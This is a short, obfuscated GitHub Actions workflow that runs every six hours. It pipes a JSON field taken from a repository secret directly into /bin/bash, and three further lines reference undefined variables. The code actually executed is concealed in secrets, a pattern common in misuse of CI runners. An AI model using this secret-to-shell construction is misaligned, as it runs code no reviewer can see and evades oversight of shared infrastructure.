name: tangbuzhi5678

on:
  workflow_dispatch:
  schedule:
    - cron: '8 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tangbuzhi5678
        env:
          szw0: ${{ secrets.szw0 }}
        run: |
          echo $szw0 | jq -r .gct3 | /bin/bash
          echo $cldmp295 | jq -r .mm64196 | /bin/bash
          echo $f1 | jq -r .ewzl99706 | /bin/bash
          echo $l11990 | jq -r .b513 | /bin/bash

